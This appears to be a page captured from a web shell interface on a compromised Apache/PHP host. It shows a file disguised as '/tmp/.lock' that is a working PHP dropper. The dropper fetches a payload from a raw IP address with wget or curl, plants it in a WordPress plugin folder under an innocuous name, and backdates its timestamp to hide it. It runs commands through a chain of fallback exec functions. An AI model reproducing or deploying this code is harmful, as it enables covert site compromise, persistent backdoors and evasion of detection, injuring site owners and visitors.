HEX
Server: Apache
System: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User: u106391720 (10342218)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //tmp/.lock
<?php   $p = '/kunden/homepages/34/d890102484/htdocs/sites/eglise/wp-content/plugins/kadence-blocks/dist/blocks/tabs/livehelp_step3.php'; $u = 'http://213.209.159.254/tmp/TaNcdUJYjg'; $fs = 682; $ft = 1725042317; run("wget -O {$p} {$u}"); check($p, $fs, $ft); run("curl -o {$p} {$u}"); check($p, $fs, $ft); function check($p, $fs, $ft) {     if (file_exists($p) && filesize($p) == $fs) {         @touch($p, $ft);         die('!success!');     } } function run($in) {     $out = '';     if (function_exists('exec')) {         @exec($in, $out);         $out = @join("\n", $out);     } elseif (function_exists('passthru')) {         ob_start();         @passthru($in);         $out = ob_get_clean();     } elseif (function_exists('system')) {         ob_start();         @system($in);         $out = ob_get_clean();     } elseif (function_exists('shell_exec')) {         $out = shell_exec($in);     } elseif (is_resource($f = @popen($in, "r"))) {         $out = "";         while (!@feof($f)) $out .= fread($f, 1024);         pclose($f);     }     return $out; } die('!ended!');